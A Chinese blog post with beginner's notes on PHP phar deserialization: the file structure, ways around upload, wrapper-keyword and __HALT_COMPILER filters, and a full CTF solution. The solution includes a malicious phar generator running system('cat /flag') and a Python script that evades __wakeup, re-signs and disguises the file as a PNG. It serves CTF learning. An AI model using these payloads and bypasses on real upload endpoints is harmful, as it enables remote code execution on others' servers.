初学phar反序列化

已于 2023-10-18 20:46:46 修改
阅读量629 收藏 2
点赞数
文章标签: php firefox 网络安全
于 2023-09-20 21:32:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63253040/article/details/133100140
版权

以下内容参考大佬博客:PHP Phar反序列化浅学习 - 跳跳糖

首先了解phar是什么东东

Phar是PHP的压缩文档,是PHP中类似于JAR的一种打包文件。它可以把多个文件存放至同一个文件中,无需解压,PHP就可以进行访问并执行内部语句。

默认开启版本 PHP version >= 5.3

结构:

1、Stub//Phar文件头
2、manifest//压缩文件信息
3、contents//压缩文件内容
4、signature//签名

我们直接按照模板生成一个看看就能了解这个结构是什么意思了

先设置php.ini,phar.readonly = Off,注意要删除“;”分号,我在这疑惑了挺久

ini_set('phar.readonly',0); ==>是行不通的,不是所有的设置都能通过ini_set设置

生成模板:

#get_phar.php
<?php 
class test{
    public $name="test";
    function __destruct()
    {
        echo $this->name . " is a web vegetable dog ";
    }
}
$a = new test();
$a->name="bthcls";
$bthcls=new phar('bthcls.phar',0);//后缀名必须为phar
$bthcls->startBuffering();//开始缓冲 Phar 写操作
$bthcls->setMetadata($a);//自定义的meta-data存入manifest
$bthcls->setStub("<?php __HALT_COMPILER();?>");//设置stub,stub是一个简单的php文件。PHP通过stub识别一个文件为PHAR文件,可以利用这点绕过文件上传检测
$bthcls->addFromString("test.txt","test");//添加要压缩的文件
$bthcls->stopBuffering();//停止缓冲对 Phar 归档的写入请求,并将更改保存到磁盘
?>

访问get_phar.php,010分析生成的bthcls.phar

具体如下

Stub

Stub是Phar的文件标识,也可以理解为它就是Phar的文件头
这个Stub其实就是一个简单的PHP文件,它的格式具有一定的要求,具体如下

xxx<?php xxx; __HALT_COMPILER();?>

这行代码的含义,也就是说前面的内容是不限制的,但在该PHP语句中,必须有__HALT_COMPILER(),没有这个,PHP就无法识别出它是Phar文件。
这个其实就类似于图片文件头,比如gif文件没有GIF89A文件头就无法正确的解析图片

manifest

a manifest describing the contents,用于存放文件的属性、权限等信息。
这里也是反序列化的攻击点,因为这里以序列化的形式存储了用户自定义的Meta-data

contents

the file contents,这里用于存放Phar文件的内容

signature

[optional] a signature for verifying Phar integrity (phar file format only),签名(可选参数),位于文件末尾,签证尾部的01代表md5加密,02代表sha1加密,04代表sha256加密,08代表sha512加密,签名就是hash校验的意思

绕过方式

存在漏洞,就会存在防护,通常针对Phar反序列化也是有防范的。这里简单的总结一下常见的绕过方式。

更改文件格式

我们利用Phar反序列化的第一步就是需要上传Phar文件到服务器,而如果服务端存在防护,比如这种

$_FILES["file"]["type"]=="image/gif"

要求文件格式只能为gif,这个时候我们该怎么办呢?
这个时候我们需要朝花夕拾,重提一下PHP识别Phar文件的方式。PHP通过Stub里的__HALT_COMPILER();来识别这个文件是Phar文件,对于其他是无限制的,这个时候也就意味着我们即使对文件后缀和文件名进行更改,其实质仍然是Phar文件。
示例代码

<?php
    class Test {
        public $name;
        function __construct(){
            echo "I am".$this->name.".";
        }
    }
    $obj = new Test();
    $obj -> name = "quan9i";
    $phar = new Phar('test.phar');
    $phar -> startBuffering(); //开始缓冲 Phar 写操作
    $phar -> setStub('GIF89a<?php __HALT_COMPILER();?>'); //设置stub,添加gif文件头
    $phar ->addFromString('test.txt','test'); //要压缩的文件
    $phar -> setMetadata($obj);  //将自定义meta-data存入manifest
    $phar -> stopBuffering(); 停止缓冲对 Phar 归档的写入请求,并将更改保存到磁盘
?>

在浏览器上访问此文件生成test.phar文件,用010editor查看
在这里插入图片描述
随便找一个分析文件格式的
在这里插入图片描述
变成Gif格式,这种上传一般可以绕过大多数上传检测。

绕过phar关键词检测

Phar反序列化中,我们一般思路是上传Phar文件后,通过给参数赋值为Phar://xxx来实现反序列化,而一些防护可能会采取禁止参数开头为Phar等关键字的方式来防止Phar反序列化,示例代码如下

if (preg_match("/^php|^file|^phar|^dict|^zip/i",$filename){
    die();
}

绕过的话,我们的办法是使用各种协议来进行绕过,具体如下

1、php://filter/read=convert.base64-encode/resource=phar://test.phar
//即使用filter伪协议来进行绕过
2、compress.bzip2://phar:///test.phar/test.txt
//使用bzip2协议来进行绕过
3、compress.zlib://phar:///home/sx/test.phar/test.txt
//使用zlib协议进行绕过
绕过__HALT_COMPILER检测

我们在前文初识Phar时就提到过,PHP通过__HALT_COMPILER来识别Phar文件,那么出于安全考虑,即为了防止Phar反序列化的出现,可能就会对这个进行过滤,示例代码如下

if (preg_match("/HALT_COMPILER/i",$Phar){
    die();
}

这里的话绕过思路有两个
1、将Phar文件的内容写到压缩包注释中,压缩为zip文件,示例代码如下

<?php
$a = serialize($a);
$zip = new ZipArchive();
$res = $zip->open('phar.zip',ZipArchive::CREATE); 
$zip->addFromString('flag.txt', 'flag is here');
$zip->setArchiveComment($a);
$zip->close();    
?>

2、将生成的Phar文件进行gzip压缩,压缩命令如下

gzip test.phar

效果如下
在这里插入图片描述
压缩后同样也可以进行反序列化

那么在ctf里如何利用他的反序列化?以一道题为例

[NSSRound#4 SWPU]1zweb

不想浪费金币,所以不再开环境了。。下面是我复制的源码

#index.php
<html>
    <head>
        <title>1zWeb</title>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    </head>
<form action="./" method="post" onsubmit="return enter()" class="form">
    <h2 class="form__title">查询文件</h2>
    <input type="text" placeholder="请输入文件名" name="file" class="input" />
    <button class="btn" type="submit" name="submit">查看</button>
</form>
<form action="./upload.php" enctype="multipart/form-data" method="post">
    <h2 class="form__title">上传文件</h2>
    <input type="file" name="file">
    <button type="submit" name="submit">上传</button>
</form>
</html>
<?php
class LoveNss{
    public $ljt;
    public $dky;
    public $cmd;
    public function __construct(){
        $this->ljt="ljt";
        $this->dky="dky";
        phpinfo();
    }
    public function __destruct(){
        if($this->ljt==="Misc"&&$this->dky==="Re")
            eval($this->cmd);
    }
    public function __wakeup(){
        $this->ljt="Re";
        $this->dky="Misc";
    }
}
$file=$_POST['file'];
if(isset($_POST['file'])){
    echo file_get_contents($file);
}

#upload.php
<html>
    <head>
        <title>1zWeb</title>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    </head>
</html>
<?php
if ($_FILES["file"]["error"] > 0){
    echo "上传异常";
}
else{
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    $temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (($_FILES["file"]["size"] && in_array($extension, $allowedExts))){
        $content=file_get_contents($_FILES["file"]["tmp_name"]);
        $pos = strpos($content, "__HALT_COMPILER();");
        if(gettype($pos)==="integer"){
            echo "ltj一眼就发现了phar";
        }else{
            if (file_exists("./upload/" . $_FILES["file"]["name"])){
                echo $_FILES["file"]["name"] . " 文件已经存在";
            }else{
                $myfile = fopen("./upload/".$_FILES["file"]["name"], "w");
                fwrite($myfile, $content);
                fclose($myfile);
                echo "上传成功 ./upload/".$_FILES["file"]["name"];
            }
        }
    }else{
        echo "dky不喜欢这个文件 .".$extension;
    }
}
?>

两个功能点,一个任意文件读取(file_get_contents),一个文件上传(上传格式为白名单图片,内容不含__HALT_COMPILER();)

这里的文件读取没有做限制,所以可以直接读取/flag

实际考察的方法是phar反序列化,绕过内容限制、后缀和__wakeup()

那么我们第一步先生成phar

class LoveNss{
    public $ljt;
    public $dky;
    public $cmd;
    public function __construct(){
        $this->ljt="Misc";
        $this->dky="Re";
        $this->cmd="system('cat /flag');";
    }
}
$bthcls = new LoveNss();
$tttang=new phar('bthcls.phar',0);//后缀名必须为phar
$tttang->startBuffering();//开始缓冲 Phar 写操作
$tttang->setMetadata($bthcls);//自定义的meta-data存入manifest
$tttang->setStub("GIF89a<?php __HALT_COMPILER();?>");//设置stub,stub是一个简单的php文件。PHP通过stub识别一个文件为PHAR文件,可以利用这点绕过文件上传检测
$tttang->addFromString("test.txt","test");
$tttang->stopBuffering();*/

再利用python脚本绕过,注意修改过内容后需重新签名!

import gzip
from hashlib import sha1
with open('E:\\phpstudy_pro\\WWW\\study\\bthcls.phar', 'rb') as file:
    f = file.read() 
s = f[:-28] # 获取要签名的数据
s = s.replace(b'3:{', b'4:{')#更换属性值,绕过__wakeup
h = f[-8:] # 获取签名类型以及GBMB标识
newf = s + sha1(s).digest() + h # 数据 + 签名 + (类型 + GBMB)
#print(newf)
newf = gzip.compress(newf) #对Phar文件进行gzip压缩
with open('E:\\phpstudy_pro\\WWW\\study\\bthcls.png', 'wb') as file:#更改文件后缀
    file.write(newf)

最后上传bthcls.png,读取phar://upload/bthcls.png就结束了

写博客还是不习惯,以后还是写md吧...

白塔河冲浪手
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
利用PHAR协议进行PHP反序列化攻击1
08-03
乎所有件操作函数都可触发 phar 反序列化题地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
codecept.phar
09-23
codecept.phar 测试程序,移动该文件至 存放php 根目录中 存放 php.exe的地方 创建: codecept.bat 输入: ``` @php "%~dp0codecept.phar" %* ``` 使用说明:...
【心得】PHP反序列化高级利用(phar|session)个人笔记
uuzeray的博客
01-01 1502
因为class.php的类都在初始界面注册,我们通过强制文件上传的形式,把filename存到session中,在session_start()触发反序列化,利用恶意类进行任意文件读取。能够上传phar文件,找到大量使用的file_exists等文件读取函数,通过控制phar://头,来使用phar协议来解析phar包。如果有上传点,上传文件的前半部分可控,后缀黑名单,不能上传危险的后缀为php phps phtml ini 没有禁止上传phar文件。session 可以放字符串,数字,也可以放对象。
php反序列化漏洞——phar反序列化漏洞
m0_73756016的博客
04-01 1181
类比java语言JAR是开发Java程序一个应用,包括所有的可执行、可访问的文件,都打包进了一个JAR文件里使得部署过程十分简单。PHAR("Php ARchive")是PHP里类似于JAR的一种打包文件对于PHP 5.3 或更高版本,Phar后缀文件是默认开启支持的,可以直接使用它。文件包含:phar伪协议,可读取 .phar文件。
phar反序列化+文件上传与例题讲解
2301_79708753的博客
01-26 1093
web笔记相关于phar反序列化+文件上传与例题讲解,欢迎各位指正
Phar反序列化
weixin_63231007的博客
06-06 1550
phar (PHP Archive) 是PHP里类似于Java中jar的一种打包文件,用于归档。当PHP 版本>=5.3时默认开启支持PHAR文件的。phar文件默认状态是只读,使用phar文件不需要任何的配置。而phar://伪协议即PHP归档,用来解析phar文件内容。生成、使用phar文件php.ini中需要设置 phar.readonly=off 生成特殊的phar文件,使代码运行第六行,打印flag phar文件中的metadata以序列化形式存储,解析phar文件时会进行反序列化操作。
phar反序列化
09-23 210
通常我们在利用反序列化漏洞的时候,只能将序列化后的字符串传入unserializ(),随着代码安全性越来越高,利用难度也越来越大。利用phar文件会以序列化的形式储存用户自定义的meta-data这一特性,扩展了php反序列漏洞的攻击面。该方法在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以不依赖unserialize()直...
PHPphar反序列化
errorr0
03-14 1669
一个不需要unserialize也能反序列化的漏洞
composer.phar
02-03
composer.phar composer.phar composer.phar composer.phar
php phar 反序列化,phar反序列化
weixin_39651488的博客
03-20 284
phar原理:一个标志,格式为xxx,前面内容不限,但必须以__HALT_COMPILER();?>来结尾,否则phar扩展将无法识别这个文件为phar文件。ps:要将php.ini中的 phar.readonly选项设置为Off。一个例子序列化class TestObject {}$phar = new Phar("phar.phar"); //后缀名必须为phar$phar->st...
phar反序列化学习SWPUCTF2018 SimplePHP
qq_61142406的博客
05-26 187
https://xz.aliyun.com/t/3692#toc-13 <?php class C1e4r { public $test; public $str; public function __construct($name) { $this->str = $name; } public function __destruct() { $this->test = $this->str;
phar反序列化学习
qq_53755216的博客
06-09 1316
phar反序列化 什么是phar文件 phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。 PHAR (“Php ARchive”) 是PHP里类似于JAR的一种打包文件。如果你使用的是 PHP 5.3 或更高版本,那么Phar后缀文件是默认开启支持的,你不需要任何其他的安装就可以使用它。 在软件中,PHARPHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如
phar反序列化的简单总结
m0_62422842的博客
04-22 686
前言 一般我们在做题时,看到代码中有serialize函数或者unserialize函数,我们肯定会想到php反序列化,那如果代码中没有这两个函数,它0是不是也能进行反序列化? 来自Secarma的安全研究员Sam Thomas发现了一种新的漏洞利用方式—phar反序列化。不用serialize函数就能进行序列化操作,这其实就跟phar://伪协议和phar 文件的打包机制有关。 什么是phar 它就是一种php程序的一种打包文件,类似与java中的jar文件,无需解压,直接通过phar://伪协
phar 反序列化本地测试
3569
10-24 748
https://xz.aliyun.com/t/2715 看了上边的文章,然后根据他的代码来复现的。   众多文件操作函数能反序列化在于使用了 phar_parse_url,之后有调用到 phar_var_unserialize。 生成 phar代码:  test.txt随便写就行,没必要真实存在 &lt;?php class TestObject { } $...
PHP Phar反序列化总结
Love&Share
10-18 4103
利用phar文件会以序列化的形式存储用户自定义的meta-data这一特性,拓展php反序列化漏洞的攻击面,这篇文章来总结下ctf遇到的phar的利用和绕过方式 Phar文件结构 phar文件是php里类似于JAR的一种打包文件本质上是一种压缩文件,在PHP 5.3 或更高版本中默认开启,一个phar文件一个分为四部分 1.a stub 可以理解为一个标志,格式为xxx<?php xxx; __HALT_COMPILER();?>,前面内容不限,但必须以__HALT_COMPILER()
php fpdf使用记录
最新发布
meis27461的博客
06-01 310
使用composer安装fpdf简单创建一个pdf文件并输出下载。
phar反序列化poc
05-21
Phar反序列化漏洞是指攻击者利用PHP中的Phar文件解析器对不受信任数据进行反序列化攻击的一种安全漏洞。攻击者可以通过构造特定的Phar文件,触发解析器反序列化恶意代码,从而实现远程代码执行。 一个简单的Phar反序列化POC如下: ``` <?php class Example { public $command; } $phar = new Phar('phar.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $example = new Example(); $example->command = 'echo "Hello World";'; $phar->setMetadata($example); $phar->stopBuffering(); include 'phar://phar.phar/test.txt'; ?> ``` 上述POC中,攻击者创建了一个含有恶意代码的Phar文件,并将其反序列化到`$example`变量中,最后通过`include`语句触发远程代码执行。 相关问题: 1. 什么是Phar文件? 2. 什么是反序列化漏洞? 3. 如何防范Phar反序列化漏洞?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值